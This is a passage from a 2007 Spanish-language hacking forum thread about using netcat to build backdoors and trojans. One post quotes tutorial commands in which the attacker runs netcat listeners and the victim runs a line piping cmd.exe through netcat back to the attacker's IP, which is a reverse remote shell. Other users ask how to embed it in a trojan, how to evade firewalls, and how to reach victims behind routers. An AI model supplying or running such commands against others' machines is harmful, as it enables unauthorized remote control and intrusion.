Jugando con netcat

Iniciado por WHK, 25 Marzo 2007, 03:17 AM

0 Miembros y 3 Visitantes están viendo este tema.

darkirax

ami ma pasava una cosa similar a esta i me dijero k provara kon otro puerto k nu sea al 80 como el 81 o uno mas alto del 2000 prouva haber si te va

Rigor Mortis

#401
pero cuando acabas de comprimir el archivo se crea un .exe, para enviarlo tienes que comprimirlo o hay otra manera?

#Esta duda ya la solucioné#

Rigor Mortis

#402
Cita de: ne0x en  1 Abril 2007, 23:44 PM
Jugando con Netcat VI

El atacante deberá ejecutar los comandos:


nc –vv –L –p 21
  --> La ventana por la que dará las ordenes
nc –vv –L –p 25 --> La ventana por la cual verá el resultado de las mismas.




Y la víctima debe ejecutar:

nc –d <IP_ATACANTE> 80 | cmd.exe | nc –d <IP_ATACANTE> 25


Lo que no entiendo es donde ejecuto todo eso, lo incluyo en el troyano o que hago?

#Por favor exploquenme como hacer tal cosa#

DeoZamoX

Ya se que esto es muy lammer, pero como le puedo abrir los puertos a alguien que esta detras de router?

darkirax

ueno despues de provar i provar con distintos puertos no hay manera de k se ma conecte simpre se me keda en listening...

no se k ago mal

Rigor Mortis

Buah aqui se amontonan las dudas...
-Cuando dice que se descomprime automaticamente en %homedrive%%homepath%\update   si no existe la carpeta update da error o windows crea una carpeta que se llame asi?
-También tengo la misma duda que darkirax respecto al no-ip. I me gustaria saber ademas si hay algun puerto que sea inservible porque lo bloquean los firewalls o algo.
-Ademas necesito respuesta a la duda de mi post anterior respecto a eso de usar 2 conexiones para que el firewall no salte.

Sé que es mucho pero por favor, ayudadnos.

Gracias.

D4RIO

#406
Lo que necesitan es leer algo sobre firewalls y seguridad y entender como funciona netcat antes de meter comandos. ¿De qué serviría que logres la conexion si de todas formas no entendes qué hiciste?

A demás, una costumbre muy buena es "probar antes de preguntar"... eso hace cualquier hacker que se diga "curioso"... prueba. Dejenme ponerles un ejemplo simple:

Rigor Mortis pregunta:
-Cuando dice que se descomprime automaticamente en %homedrive%%homepath%\update   si no existe la carpeta update da error o windows crea una carpeta que se llame asi?

Simple... haces la prueba, que es lo que hara otro por vos si no sabe con certeza la respuesta. No estas probando un virus "Killer"... simplemente experimentas con una conexion, y en este caso, una instalación.

Respecto a No-IP sobran los manuales y tutos en internet (uno bueno: http://mundogeek.net/archivos/2005/09/28/no-ip/). En lo personal no necesite más que seguir las instrucciones de la instalacion y lo pude usar, y automatizar para que renueve mi IP. No es cosa de Gurús.

A demás, ante la pregunta ¿Que es un DNS y como funciona? ... (que seguramente surgirá) ... tenemos dos soluciones que seguramente les pareceran una novedad: Wikipedia y Google:¬¬
OpenBSDFreeBSD

Rigor Mortis

pero si prueba se añade al registro i todo eso... pero vale, seguiré buscando informacion.

servidor32

D4RIO tiene razon, lo que tienen que hacer es probar cada cosa en sus maquinas antes de hacerlo en una ajena.

Y si, si se agrega al registro pero lo unico que tienes que hacer es entrar en el y borrar las entradas que añadio no es cosa dificil.

Skar

Hola muy buenas a todos.
Primero es felicitar por la guia.
Tengo un problema con Jugando con NetCat I, no consigo conectarme.
Envio el programa tal y como esta en la explicacion, un amigo (con el que hago este tipo de practicas) lo ejecuta (yo ya tengo los puertos en escucha) pero nada que no se conecta. E probado a ser yo el que me conecte a el y a voltear la shell pero nada ni de una forma ni de otra. Mi amigo desactiva los firewalls pero nada.
De todas formas seguire probando e investigando asta dar con ello y conseguir conectarme pero si alguien se le ocurre alguna posible solucion mejor que mejor.
Gracias y un saludo